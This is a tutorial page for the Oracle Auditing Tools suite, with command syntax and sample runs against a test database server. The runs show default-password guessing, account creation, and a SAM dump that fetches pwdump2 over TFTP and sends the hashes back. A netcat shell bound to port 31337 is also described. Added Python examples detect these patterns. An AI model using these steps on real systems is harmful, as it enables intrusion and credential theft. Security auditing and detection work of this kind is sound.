The Web Local

Oracle Auditing Tools (OAT)

OAT is a suite of tools that can be used to enumerate default Oracle accounts, query the TNS listener, open an SQL prompt or set up a TFTP session to transfer a netcat executable to the remote database server. The suite consists of the following tools:

  • Oracle Password Guesser (opwg) - Used to enumerate one or more SIDs for default usernames and passwords. The built-in accounts.default file contains 120+ username/password pairs that are tried automatically.

  • OracleQuery (oquery) - Using credentials obtained previously with opwg, sets up a pl/sql prompt so the user can interactively query the Oracle database.

  • OracleSamDump (osd) - Connects to the remote Oracle server and executes a TFTP get to fetch the pwdump2 binary. pwdump2 is then run on the server and the result is sent back by TFTP to the SAM folder of the TFTP server.

  • OracleSysExec (ose) - Can be run in interactive mode, letting the user specify commands to be executed by the server, or in automatic mode. In automatic mode, netcat is sent by TFTP to the Oracle database server and binds a shell to TCP port 31337.

  • OracleTNSCtrl (otnsctl.sh) - Used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though.

Pre-requirements

  • OAT zip file
  • Oracle JDBC driver, which can be obtained from Oracle or simply by searching the internet for classes12.zip (or from me here.)
  • Java Runtime Environment

Installation

Unix/ Linux

Copy the files to a suitable directory.

Modify the path to the JDBC driver in all .sh files, normally:

Location_saved/classes12.zip

You also need to edit the *.sh files (e.g. with vi) and amend the JAVA= line so that it points to the correct java executable, i.e.:

JAVA=/usr/java/j2re1.4.2_08/bin/java

chmod 744 opwg.sh (and all the other .sh files; they are rw only by default on initial install)

Windows

Modify the path to the java binary in the .bat files.

Modify the path to the JDBC driver, normally:

[ORACLE_HOME]\jdbc\lib\classes111.zip or [ORACLE_HOME]\jdbc\lib\classes12.zip

N.B. The accounts.default file has only 120+ standard username/password pairs; to enable a check of the 600 known Oracle default accounts, replace this file with my prepared one here.

Command Syntax

Note:- Files in brackets below are .sh (Linux) and .bat (Windows)

OraclePasswordGuesser (opwg)

Oracle Account dictionary attack tool.

C:\Oracle\oat>opwg

        Oracle Password Guesser v1.3.1 by patrik@cqure.net

        --------------------------------------------------

        OraclePwGuess [options]

                -s*     <servername>

                -u      <userfile>

                -p      <passfile>

                -d      <SID>

                -P      <portnr>

                -D      disables default pw checks

                -C      check for CREATE LIBRARY permissions

                -v      be verbose

[root@localhost oat]# sh opwg.sh -s 200.100.100.218 OR c:\opwg -s 200.100.100.218

Oracle Password Guesser v1.3.1 by patrik@cqure.net

--------------------------------------------------

Skipping PLSExtProc ...

INFO: Running pwcheck on SID test

Successfully logged in with DBSNMP/DBSNMP

Successfully logged in with SCOTT/TIGER

 

Note:- Due to extra security features within Oracle 10g Release 2, this program will give limited results unless you first supply the SID. This limits it somewhat, and it is better to use oscanner instead.

 
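The opwg output above is, from the database's side, one client host logging in to several default accounts within a few seconds. The following Python is an added example, not part of OAT or this page, that flags that pattern in simplified audit records; the record layout, the return-code mapping and the sample lines are all constructed assumptions.

```python
# Added example (not OAT code and not from the original page): flags the logon
# pattern that an opwg run produces, i.e. one client host trying many distinct
# usernames within a short window, over simplified Oracle audit records.
# The record layout, return codes and sample lines below are all constructed.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: "timestamp|client_host|username|returncode"
# returncode 1017 mirrors ORA-01017 (invalid username/password); 0 = success.
SAMPLE_AUDIT = """\
2005-09-01 10:00:01|200.100.100.208|SYS|1017
2005-09-01 10:00:01|200.100.100.208|SYSTEM|1017
2005-09-01 10:00:02|200.100.100.208|DBSNMP|0
2005-09-01 10:00:02|200.100.100.208|OUTLN|1017
2005-09-01 10:00:03|200.100.100.208|SCOTT|0
2005-09-01 10:00:03|200.100.100.208|CTXSYS|1017
2005-09-01 10:05:00|200.100.100.50|APPUSER|0
2005-09-01 10:05:30|200.100.100.50|APPUSER|1017
"""

def parse(records):
    """Parse the constructed format into (timestamp, host, user, rc) tuples."""
    out = []
    for line in records.splitlines():
        ts, host, user, rc = line.split("|")
        out.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, user, int(rc)))
    return out

def find_spraying(records, window=timedelta(seconds=60), min_users=5):
    """Return {host: (distinct_users_tried, users_logged_in)} for every client
    host that tried at least min_users distinct usernames inside one window.
    A single user failing repeatedly (a mistyped password) never trips this."""
    by_host = defaultdict(list)
    for ts, host, user, rc in sorted(parse(records)):
        by_host[host].append((ts, user, rc))
    hits = {}
    for host, events in by_host.items():
        start = 0
        for end in range(len(events)):          # sliding window over time
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            tried = {u for _, u, _ in span}
            if len(tried) >= min_users and len(tried) > hits.get(host, (0,))[0]:
                ok = sorted({u for _, u, rc in span if rc == 0})
                hits[host] = (len(tried), ok)
    return hits
```

The successful logins in the result (here DBSNMP and SCOTT) are the accounts whose default passwords are still set and need changing or locking.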

OracleQuery (oquery)

Allows interactive SQL queries against the database.

C:\Oracle\oat>oquery

        OracleQuery v1.3.1 by patrik@cqure.net

        ----------------------------------------

        OracleQuery [options]

                -s*     <servername>

                -u*     <username>

                -p*     <password>

                -d*     <SID>

                -P      <portnr>

                -v      be verbose

                -q      <query>

                -o      <outfile>

                -m      <tabledelimiter>

[localhost oat]# sh oquery.sh -s 200.100.100.218 -u scott -p tiger -d test OR c:\oquery -s 200.100.100.218 -u scott -p tiger -d test

OracleQuery v1.3.1 by patrik@cqure.net

----------------------------------------

pl/sql>  create user "[Username]" identified by "[Password]"

Will create an account and set its password - remember the double quotes ("")!

OracleSamDump (osd)

Connects to the Oracle server and executes a TFTP get to fetch the pwdump2 binary. pwdump2 is then run on the server and the result is returned to the SAM folder of the TFTP server.

C:\Oracle\oat>osd

        Oracle Sam Dump v1.3.1 by patrik@cqure.net

        ------------------------------------------

        OracleSamDump [options]

                -s*     <servername>

                -u      <username>

                -p      <password>

                -d      <SID>

                -P      <portnr>

                -l      <localIP>

                -T      <temppath>

                -v      be verbose

[root@localhost oat]# sh osd.sh -s 200.100.100.218 -u scott -p tiger -d test OR c:\osd -s 200.100.100.218 -u scott -p tiger -d test

 Oracle Sam Dump v1.3.1 by patrik@cqure.net

------------------------------------------

INFO: Local IP seems to be 200.100.100.208

SERVER:[2] Tftp Server thread started.

ERROR: create library elite_haxxor_lib as '%windir%\system32\kernel32.dll';

INFO: Uploading PWDUMP2 to Oracle Server

INFO: Dumping the SAM on Oracle Server

INFO: Fetching sam.txt

INFO: If all went well, the server SAM file should be in tftproot/sam

INFO: Cleaning up !

ERROR: drop library elite_haxxor_lib

INFO: Stopping TFTP Server

 
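The osd output above shows the footprint that matters to a defender: a CREATE LIBRARY pointing at an OS runtime DLL, followed shortly after by a DROP LIBRARY of the same name. The following Python is an added example, not part of OAT or this page, that looks for that sequence in constructed audit records; the record layout, the sample lines and the list of runtime library names are assumptions.

```python
# Added example (not OAT code and not from the original page): scans
# constructed Oracle audit entries for the CREATE LIBRARY / DROP LIBRARY
# sequence that osd leaves behind. Record layout and sample lines are
# constructed; the kernel32.dll path comes from the osd output shown above.
import re
from datetime import datetime, timedelta

# Constructed records: "timestamp|db_user|sql_text"
SAMPLE_AUDIT = """\
2005-09-01 10:10:00|SCOTT|create library elite_haxxor_lib as '%windir%\\system32\\kernel32.dll'
2005-09-01 10:10:04|SCOTT|drop library elite_haxxor_lib
2005-09-01 11:00:00|APPOWNER|CREATE LIBRARY img_lib AS '/opt/app/lib/libimg.so'
2005-09-01 11:00:10|APPOWNER|select count(*) from images
"""

# Assumption: a library path naming the OS C runtime is treated as high risk,
# since it hands PL/SQL callers direct access to OS functions.
OS_RUNTIME = re.compile(r"(kernel32\.dll|msvcrt\.dll|libc\.so)", re.I)
CREATE_LIB = re.compile(r"create\s+(?:or\s+replace\s+)?library\s+(\w+)\s+as\s+'([^']+)'", re.I)
DROP_LIB = re.compile(r"drop\s+library\s+(\w+)", re.I)

def find_library_ddl(records, max_lifetime=timedelta(minutes=5)):
    """Return one finding per CREATE LIBRARY seen, as a dict with keys
    user, name, path, os_runtime and short_lived. short_lived becomes True
    when the same user drops the library within max_lifetime, which is the
    create / use / clean-up rhythm visible in the osd output."""
    findings, open_libs = [], {}
    for line in records.splitlines():
        ts_s, user, sql = line.split("|", 2)
        ts = datetime.strptime(ts_s, "%Y-%m-%d %H:%M:%S")
        m = CREATE_LIB.search(sql)
        if m:
            name, path = m.group(1).upper(), m.group(2)
            f = {"user": user, "name": name, "path": path,
                 "os_runtime": bool(OS_RUNTIME.search(path)), "short_lived": False}
            findings.append(f)
            open_libs[(user, name)] = (ts, f)
            continue
        m = DROP_LIB.search(sql)
        if m and (user, m.group(1).upper()) in open_libs:
            created_at, f = open_libs.pop((user, m.group(1).upper()))
            f["short_lived"] = ts - created_at <= max_lifetime
    return findings
```

A finding with both os_runtime and short_lived set is the one to escalate; the same check is also a reason to review which accounts hold CREATE LIBRARY, the privilege opwg's -C option probes for.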

OracleSysExec (ose)

C:\Oracle\oat>ose

        OracleSysExec v1.3.1 by patrik@cqure.net

        ----------------------------------------

        OracleSysExec [options]

                -s*     <servername>

                -u      <username>

                -p      <password>

                -d      <SID>

                -P      <portnr>

                -l      <localIP>

                -T      <temppath>

                -t      <platform>

                -I      interactive mode

                -v      be verbose

[root@localhost oat]# sh ose.sh -s 200.100.100.218 -u scott -p tiger -d test -t Windows OR c:\ose -s 200.100.100.218 -u scott -p tiger -d test -t Windows

-t = Windows or Solaris (depending on the target platform)

 

OracleTNSCtrl (otnsctl.sh)

Used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to see commands currently implemented.

C:\Oracle\oat>otnsctl

Oracle TNS Control v1.3.1 by patrik@cqure.net

---------------------------------------------

OracleTNSCtrl [options]

          -s*     <servername>

          -P      <portnr>

          -c      command to execute (status/services/version/etc.)

          -I*     interactive mode

          -v      be verbose

[root@localhost oat]# sh otnsctl.sh -s 200.100.100.218 -I OR c:\otnsctl -s 200.100.100.218 -I

 Oracle TNS Control v1.3.1 by patrik@cqure.net

---------------------------------------------

tnscmd> help

help

set password - sets the password with which to connect to the listener

services - shows services version

status - shows status

version - returns version information
